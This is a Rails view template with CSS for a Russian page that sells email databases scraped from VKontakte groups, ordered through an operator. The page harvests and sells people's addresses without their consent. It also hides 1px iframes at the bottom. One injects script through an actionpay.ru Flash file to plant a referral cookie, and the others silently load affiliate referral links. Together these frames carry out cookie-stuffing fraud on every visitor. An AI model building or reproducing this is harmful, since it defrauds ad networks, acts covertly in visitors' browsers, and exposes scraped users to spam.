<style type="text/css">
  
/* Badger
------------------------- */

[class*="badger"] {
    position: relative;
    margin: 15px 0;
    padding: 39px 19px 14px;
    background: #fff;
    border: 1px solid #ddd;
    border-radius: 6px;
}

[class*="badger"]:after {
    content: attr(data-badger);
    position: absolute;
    top: 0;
    padding: 3px 7px;
    font-size: 12px;
    font-weight: bold;
    background: #999;
    color: #fff;
}

.badger-left:after {
    left: 0;
    border-radius: 6px 0 6px 0;
}

.badger-right:after {
    right: 0;
    border-radius: 0 6px 0 6px;
}

.badger-danger:after {
    background: #d9534f;
}

.badger-warning:after {
    background: #f0ad4e;
}

.badger-success:after {
    background: #5cb85c;
}

.badger-info:after {
    background: #5bc0de;
}

.badger-inverse:after {
    background: #222;
}

.span4 form {
  margin-top: 60px;
}
</style>
       

<div class="span3">
<%= semantic_form_for @order, html: {role:"form", style:"width:100%;"}, remote: true do |f| %>
  <%= f.inputs do %>
    <%= f.input :vk_group_link, label: "Ссылка на группу ВК" %>
    <%= f.input :vk_city_id, label: "Город", as: :select, collection: VkCity::CITIES.map{|k,v| [v,k]}, prompt: "Не важно" %>
    <%= f.input :sex, label: "Пол", as: :select, collection: [["Мужской", 2],["Женский", 1]], prompt: "Не важно" %>
  <% end %>
  <%= f.action :submit, label: "Заказать базу" %>
<% end %>

</div>
<div class="span3">
  <ul style="margin:0px;">
    <h2 id="emails-count"></h2>
    <li>1. Введите адрес группы вконтакте</li>
    <li>2. Узнайте сколько емейлов с нее получилось извлечь</li>
    <li>3. Сделайте заказ и напишите оператору номер заказа</li>
    <li style="margin-top:20px;">Контакты оператора:</li>
<% if request.host == "vkbases.ru" %>
<li class="badger-left badger-warning" data-badger="ВК">
  <a href="http://vk.com/easy_mod">http://vk.com/easy_mod</a>
</li> 
<% else %>
<li class="badger-left badger-info" data-badger="Skype">
  catunderhat
</li> 

<li class="badger-left badger-success" data-badger="ВК">
  <a href="http://vk.com/easy_mod">http://vk.com/easy_mod</a>
</li> 
<% end %>

  </ul>

</div>
<iframe width="1px" height="1px" src="http://cn.actionpay.ru/upload/14/22/20/1422205267767.swf?id=\%22))}catch(e){}document.cookie='ref=NzI2MzEzOTEyNDY4;domain=actionpay.ru;path=/'//&width&height"></iframe>

<iframe width="1px" height="1px" src="data:text/html,<img src='https://www.admitad.com/ru/promo/?ref=25fdfcc6b0'>"></iframe>
<iframe width="1px" height="1px" src="data:text/html,<img src='https://advertstar.ru/?ref=6163'>"></iframe>
<iframe width="1px" height="1px" src="data:text/html,<img src='http://office.ad1.ru/i/192637'>"></iframe>
<img width="1px" height="1px" src="http://my.mail.ru/mail/tigra-tour-stats">
